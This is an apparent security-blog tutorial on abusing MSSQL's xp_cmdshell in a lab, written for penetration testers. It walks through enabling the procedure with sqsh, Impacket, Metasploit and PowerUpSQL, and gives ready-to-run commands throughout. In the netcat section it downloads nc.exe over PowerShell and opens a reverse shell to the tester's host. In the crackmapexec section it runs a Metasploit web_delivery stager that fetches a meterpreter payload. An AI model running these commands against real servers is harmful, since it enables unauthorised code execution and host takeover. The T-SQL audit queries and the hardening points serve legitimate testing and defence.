This article is the third in our series on MSSQL Server penetration testing. In it we look at the xp_cmdshell extended stored procedure: what it is, how it gets enabled, and how it is abused once a tester holds sufficiently privileged credentials.
Table of Contents
· Introduction
o What is xp_cmdshell?
· Enabling xp_cmdshell
o Manually (GUI)
o sqsh
o mssqlclient.py
o Metasploit
· Exploiting xp_cmdshell
o Metasploit
o Netcat
o Crackmapexec
o Nmap
o PowerUpSQL
· Conclusion
Introduction
All the demonstrations in this article are performed against an MSSQL Server. To build the same lab, refer to our article Penetration Testing Lab Setup: MS-SQL. We previously touched on exploiting xp_cmdshell with the Metasploit module exploit/windows/mssql/mssql_payload in our article MSSQL Penetration Testing with Metasploit, but that article did not cover the background of xp_cmdshell or its security implications, which is what we do here.
What is xp_cmdshell?
According to the official Microsoft documentation, xp_cmdshell is an extended stored procedure that spawns a Windows command shell and passes it a string for execution. Any output the command produces is returned as rows of text. Put simply, it lets a database administrator launch any external process directly from SQL Server. The procedure dates back to SQL Server 6.5 and was designed so that developers could combine SQL queries with operating system commands to automate tasks that would otherwise need additional programming. Because the spawned shell runs on the database host with the privileges of the SQL Server service account (or of the xp_cmdshell proxy account when the caller is not a sysadmin), it is a direct bridge from SQL access to operating system command execution, which is why Microsoft ships it disabled. Now that we know what xp_cmdshell is, we can see how it is enabled on a SQL Server instance.
Enabling xp_cmdshell: Manually (GUI)
xp_cmdshell is disabled by default, so before we can use it we need to enable it. Changing the setting requires the ALTER SETTINGS server permission, which members of the sysadmin and serveradmin fixed server roles hold. In the demonstration below we log in to the SQL Server with the credentials of the sa user, which is a sysadmin.
With SQL Server Management Studio connected to the instance as sa, we go to the Object Explorer pane. It lists the SQL Server instance; right-clicking the instance opens a context menu from which we choose the "Facets" option, as demonstrated below.
Clicking the Facets option opens a new window with a drop-down listing the available facets. We choose the Surface Area Configuration facet from this drop-down, as shown in the image below.
After choosing the Surface Area Configuration facet, we can see that the XPCmdShellEnabled property is set to False.
Clicking the XPCmdShellEnabled property, we change its value from False to True and apply, as shown in the figure below. That is all it takes to enable xp_cmdshell through the graphical interface on a Windows MSSQL Server; under the hood the facet runs the same sp_configure and RECONFIGURE statements shown in the next section.
Enabling xp_cmdshell: sqsh
Next, we use the sqsh tool on our Kali machine to check whether xp_cmdshell is enabled on the target. The syntax is simple: sqsh with -S and the target IP address, -U with the login name of the server administrator, and -P with that login's password, as shown in the image below. In sqsh each batch is sent to the server when we type go on its own line.
sqsh -S 192.168.1.146 -U sa -P "Password@1"
xp_cmdshell 'whoami';
go
As the image shows, the server responds that it blocked access to procedure 'sys.xp_cmdshell' because the component is turned off as part of the security configuration, so we now enable it. To enable xp_cmdshell from sqsh we run a short series of statements: first expose the advanced options of sp_configure with 'show advanced options', then set the 'xp_cmdshell' option to 1, and finally run RECONFIGURE so the new value takes effect. Because 'xp_cmdshell' is itself an advanced option, a RECONFIGURE is also needed between the two sp_configure calls; otherwise the second call fails with "The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option." The full sequence is shown in the image below.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go
xp_cmdshell 'whoami';
go
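The statements above are exactly what every tool in this article sends to the server; the difference is only the wrapper. As an added example that is not from the original article, the following T-SQL puts the checks a tester wants around that sequence: who the current login is and whether it can change server options at all, the option's state before and after, the command output captured into a table instead of scrolled past, and the setting restored at the end. It assumes a sqsh session like the one above (go is sqsh's batch separator, not T-SQL); the command run, whoami /groups, is an arbitrary choice.

```sql
-- Added example (not from the original article). Each "go" is one sqsh batch.

-- 1. Who am I, and may I change server options at all?
--    sp_configure needs ALTER SETTINGS, which sysadmin and serveradmin hold.
SELECT SUSER_SNAME()                                    AS login_name,
       IS_SRVROLEMEMBER('sysadmin')                     AS is_sysadmin,
       HAS_PERMS_BY_NAME(NULL, NULL, 'ALTER SETTINGS')  AS can_alter_settings;
go

-- 2. State before we touch anything.
--    value = what sp_configure set, value_in_use = what is active after RECONFIGURE.
--    Note value_in_use so step 5 can put it back.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('show advanced options', 'xp_cmdshell');
go

-- 3. Enable. 'xp_cmdshell' is an advanced option, so the first RECONFIGURE is
--    required; without it the second sp_configure reports that the option
--    "does not exist, or it may be an advanced option".
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go

-- 4. Run a command and keep its output in a table variable so it can be
--    filtered or joined later. xp_cmdshell appends a trailing NULL row,
--    which the WHERE clause drops.
DECLARE @out TABLE (line NVARCHAR(4000));
INSERT INTO @out
EXEC master.sys.xp_cmdshell 'whoami /groups';
SELECT line FROM @out WHERE line IS NOT NULL;
go

-- 5. Leave the server as it was found (only if step 2 showed both at 0).
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
go
```

Step 1 is worth running before anything else on an engagement: if can_alter_settings is 0 the enabling sequence will fail, and the only remaining route to xp_cmdshell is a login that already has EXECUTE on it together with a configured proxy account.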
The change can be verified in the same way as with the GUI: reopen the Surface Area Configuration facet and confirm that XPCmdShellEnabled now reads True, or simply note that the whoami call above now returns output.
Enabling xp_cmdshell: mssqlclient.py
The next tool for the job is mssqlclient.py, a Python script that ships with the Impacket toolkit. To use it we specify the domain, username and password, the target IP address and the port hosting the MSSQL service, as shown in the image. The output shows a connection being established, the switch to TLS negotiation, and the packet size changed from 4096 to 16192. Impacket then gets a SQL shell from the SQLEXPRESS instance, which changes the database context to master and the language setting to us_english. A banner tells us that the help command lists the extra shell commands; one of them, enable_xp_cmdshell, enables xp_cmdshell on the target by sending the same sp_configure and RECONFIGURE statements we typed by hand in sqsh.
python3 mssqlclient.py WORKGROUP/sa:Password@1@192.168.1.146 -port 1433
enable_xp_cmdshell
Again, we can verify the result in the same way as with the GUI and sqsh approaches. Here we can see that we were able to enable xp_cmdshell with mssqlclient.py from the Impacket toolkit.
mssqlclient.py is not limited to SQL logins. If we hold Windows credentials for an account with the required permissions on the instance, the -windows-auth parameter tells the target to authenticate us as that Windows user, after which we can enable xp_cmdshell in exactly the same way, as shown in the image below.
python3 mssqlclient.py administrator:'ignite@987'@192.168.1.146 -windows-auth
enable_xp_cmdshell
Enabling xp_cmdshell: Metasploit
Metasploit can also enable xp_cmdshell for us, with the exploit/windows/mssql/mssql_payload module. The module needs a couple of options: rhosts, holding the IP address of the target, and password, holding the password of the login used to authenticate (the username option defaults to sa). Before delivering anything to the target, the module first enables xp_cmdshell on it.
use exploit/windows/mssql/mssql_payload
set rhosts 192.168.1.146
set password Password@1
exploit
The module does not stop at enabling xp_cmdshell. It then runs a series of commands through it that stage and execute a payload, giving us a meterpreter session on the target as shown in the image below.
Exploiting xp_cmdshell: Metasploit
If you do not want a meterpreter session on the target and only need proof that commands can be executed, you can use the auxiliary module auxiliary/admin/mssql/mssql_exec instead. It takes a similar set of options: rhosts with the IP address of the target, password with the password of the login, and cmd with the system command to run. In the demonstration we run ipconfig to show that arbitrary system commands can be executed on the target through this module.
use auxiliary/admin/mssql/mssql_exec
set rhosts 192.168.1.146
set password Password@1
set cmd ipconfig
exploit
Exploiting xp_cmdshell: Netcat
As discussed earlier, xp_cmdshell runs system commands on the target and therefore gives us access to its resources. We can use it to get a reverse shell. To do so we first need to transfer a netcat binary to the Windows machine; we use the nc.exe executable that Kali ships in /usr/share/windows-binaries. We then serve that directory over HTTP with a Python one-liner (on a Python 3 only system use python3 -m http.server 80 instead).
cd /usr/share/windows-binaries
ls -al
python -m SimpleHTTPServer 80
Back in the SQL session, we use xp_cmdshell to invoke powershell.exe and call wget, PowerShell's alias for Invoke-WebRequest, to fetch the file we just hosted and write it to C:\Users\Public, a directory that every local user can write to. We then use xp_cmdshell a second time to execute the netcat binary with -e cmd.exe, which connects back to the Kali machine on port 4444 and attaches a command shell to the connection.
xp_cmdshell 'powershell.exe wget http://192.168.1.2/nc.exe -OutFile C:\Users\Public\nc.exe'
go
xp_cmdshell 'C:\Users\Public\nc.exe -e cmd.exe 192.168.1.2 4444'
go
Before running the second command, however, we start a netcat listener on the Kali machine. The listener catches the shell as soon as the command executes on the target. Running whoami in the resulting shell shows that we are nt service\mssql$sqlexpress, the SQL Server service account. This is the expected context: when a sysadmin calls xp_cmdshell the command runs as the service account, whereas a non-sysadmin login gets the proxy account configured with sp_xp_cmdshell_proxy_account, and fails if none is configured.
nc -lvp 4444
whoami
Exploiting xp_cmdshell: Crackmapexec
Another way to get a reverse connection through xp_cmdshell is to pair its command execution with Metasploit's web_delivery module. The process is simple: we use exploit/multi/script/web_delivery, set the target to 2 (PSH, the PowerShell stager for Windows), set the payload to windows/meterpreter/reverse_tcp, set lhost to the IP address of the Kali machine, and run exploit. The module generates a PowerShell one-liner and hosts the stage on a port, 8080 in our case.
use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
To have the target download and run that one-liner, we use crackmapexec with the mssql protocol, the IP address of the target, the username ignite and its password, and the web_delivery module with the URL that the Metasploit module printed, as shown in the image below. crackmapexec logs in, executes the one-liner through xp_cmdshell, and reports the target as Pwn3d!.
crackmapexec mssql 192.168.1.146 -u 'ignite' -p 'Password@123' -M web_delivery -o URL=http://192.168.1.2:8080/om6cxs3B
Once crackmapexec reports Pwn3d!, we switch back to the Metasploit console and find that the stager called home and we have a meterpreter session on the target.
Exploiting xp_cmdshell: Nmap
Next we use nmap to check whether xp_cmdshell is enabled on the target, with a script scan using ms-sql-xp-cmdshell. The script arguments take the username and password of the MSSQL login and, optionally, the command to run if xp_cmdshell turns out to be enabled. In the demonstration below we run net user: the image shows that xp_cmdshell was enabled, and nmap ran the command successfully, listing users such as Administrator and ignite on the target.
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@1,ms-sql-xp-cmdshell.cmd='net user' 192.168.1.146
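The nmap script answers the question from the outside with a single login. The same questions can be asked from inside the instance, together with the ones a defender (or a tester writing up findings) cares about more: who could switch xp_cmdshell on, and who can already call it without being sysadmin. The following is an added T-SQL example, not from the original article; it uses only catalog views and assumes a login that can read server metadata (sysadmin sees everything, lesser logins only see principals they have permissions on).

```sql
-- Added example (not from the original article): audit xp_cmdshell from inside.

-- Is it on right now? A mismatch between the two columns means someone ran
-- sp_configure without RECONFIGURE (or the reverse).
SELECT name, value AS configured, value_in_use AS running
FROM   sys.configurations
WHERE  name = 'xp_cmdshell';

-- Who could switch it on: members of sysadmin/serveradmin, plus any login
-- granted ALTER SETTINGS or CONTROL SERVER directly.
SELECT p.name AS login_name, p.type_desc, 'role: ' + r.name AS granted_via
FROM   sys.server_role_members m
JOIN   sys.server_principals r ON r.principal_id = m.role_principal_id
JOIN   sys.server_principals p ON p.principal_id = m.member_principal_id
WHERE  r.name IN ('sysadmin', 'serveradmin')
UNION ALL
SELECT p.name, p.type_desc, 'grant: ' + sp.permission_name
FROM   sys.server_permissions sp
JOIN   sys.server_principals p ON p.principal_id = sp.grantee_principal_id
WHERE  sp.state = 'G'
AND    sp.permission_name IN ('ALTER SETTINGS', 'CONTROL SERVER');

-- Non-sysadmin callers only get a shell if a proxy account exists; it is
-- stored as a credential with this fixed name.
SELECT name, credential_identity, create_date
FROM   sys.credentials
WHERE  name = '##xp_cmdshell_proxy_account##';

-- And who has been granted EXECUTE on the procedure itself (kept in master).
SELECT dp.name AS grantee, dp.type_desc, pe.state_desc
FROM   master.sys.database_permissions pe
JOIN   master.sys.database_principals dp ON dp.principal_id = pe.grantee_principal_id
WHERE  pe.major_id = OBJECT_ID('master.sys.xp_cmdshell')
AND    pe.permission_name = 'EXECUTE';
```

If the last two queries both return rows, xp_cmdshell is reachable from a low-privilege login even while it reads as disabled by the time you look, since anyone in the second result set can flip it back on.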
Exploiting xp_cmdshell: PowerUpSQL
Last but not least, we use PowerUpSQL on the Windows machine. We downloaded PowerUpSQL directly from its GitHub repository and opened a cmd shell on the machine; a PowerShell prompt would work just as well, but since we are in cmd we launch PowerShell from there with the -ep bypass switch, setting the execution policy to Bypass so that the PowerUpSQL module can be imported. We then import the module with Import-Module and call Invoke-SQLOSCmd with the username and password of the database login, the instance to run against (SQLEXPRESS on our host), and the command to run, here whoami. With -Verbose the tool shows what it does: it connects to the instance, checks whether the supplied login is a sysadmin, and then runs the same sequence we used in sqsh, enabling show advanced options and xp_cmdshell before executing the command. In this demonstration xp_cmdshell was already enabled, so the tool moves straight on to running whoami, which again returns nt service\mssql$sqlexpress.
cd PowerUpSQL-master
powershell -ep bypass
Import-Module .\PowerUpSQL.psd1
Invoke-SQLOSCmd -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -Command whoami -Verbose
Conclusion
This article collects the techniques a tester can reach for when assessing an MSSQL Server on which xp_cmdshell is either already enabled or can be enabled with the credentials in hand. It deliberately does not cover how those credentials were obtained or how sysadmin access was escalated; the point is that once a login with that level of access is available, the step from running SQL to running operating system commands on the host is a single configuration change, which is why xp_cmdshell, the logins that can enable it, and any configured proxy account deserve attention in both testing and hardening.